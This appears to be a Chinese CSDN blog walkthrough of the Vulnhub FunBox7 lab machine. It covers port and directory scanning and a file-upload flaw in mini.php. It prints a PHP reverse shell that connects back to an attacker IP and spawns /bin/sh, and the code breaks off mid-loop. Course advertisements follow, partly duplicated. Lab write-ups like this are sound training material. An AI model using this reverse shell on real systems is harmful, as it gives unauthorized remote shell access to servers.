看完这篇教你玩转渗透测试靶机vulnhub——FunBox7（ EASYENUM）_funbox7只扫描到53号端口

最新推荐文章于 2024-07-15 12:30:08 发布

2401_84731999

最新推荐文章于 2024-07-15 12:30:08 发布

阅读量381

点赞数 3

分类专栏：程序员文章标签：单元测试功能测试学习

本文链接：https://blog.csdn.net/2401_84731999/article/details/138770369

版权

程序员专栏收录该内容

126 篇文章 0 订阅

订阅专栏

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以戳这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

Vulnhub靶机安装：

下载好了把安装包解压然后导入Oracle VM打开即可。
在这里插入图片描述

Vulnhub靶机漏洞详解：

①：信息收集：

kali里使用netdiscover发现主机
在这里插入图片描述
渗透机：kali IP ：172.16.5.117 靶机IP ：172.16.5.112

ping的通环境搭建成功！！

在这里插入图片描述

通过nmap 扫描发现开启了22和80端口简单的扫一下 dirsearch -u url 访问robots.txt 并没有可以利用的信息

在这里插入图片描述

再次进行扫描使用gobuster 访问mini.php 发现是有文件上传漏洞！！

gobuster dir -u http://172.16.5.112/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -e

在这里插入图片描述

②：文件上传GetShell：

在这里插入图片描述

可以通过修改 mini.php 然后nc getshell 使用Python 进行交互：python3 -c 'import pty; pty.spawn("/bin/bash")'

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.16.5.117';  // CHANGE THIS
$port = 6666;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl\_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function\_exists('pcntl\_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl\_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix\_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc\_open($shell, $descriptorspec, $pipes);

if (!is\_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream\_select tells us they won't
stream\_set\_blocking($pipes[0], 0);
stream\_set\_blocking($pipes[1], 0);
stream\_set\_blocking($pipes[2], 0);
stream\_set\_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream\_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in\_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in\_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in\_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}


![img](https://img-blog.csdnimg.cn/img_convert/1fac97ead4c608dc669afd49be39bbec.png)
![img](https://img-blog.csdnimg.cn/img_convert/5fc857e8d68755f33a82c0ebce5105b9.png)
![img](https://img-blog.csdnimg.cn/img_convert/6cb8734f0506e034fbe55287bc31f5f4.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上软件测试知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化的资料的朋友，可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

入学习提升的进阶课程，涵盖了95%以上软件测试知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化的资料的朋友，可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

2401_84731999

关注

3
点赞
踩
8

收藏

觉得还不错? 一键收藏
0
评论
看完这篇教你玩转渗透测试靶机vulnhub——FunBox7（ EASYENUM）_funbox7只扫描到53号端口

【代码】看完这篇教你玩转渗透测试靶机vulnhub——FunBox7（ EASYENUM）_funbox7只扫描到53号端口。
复制链接

扫一扫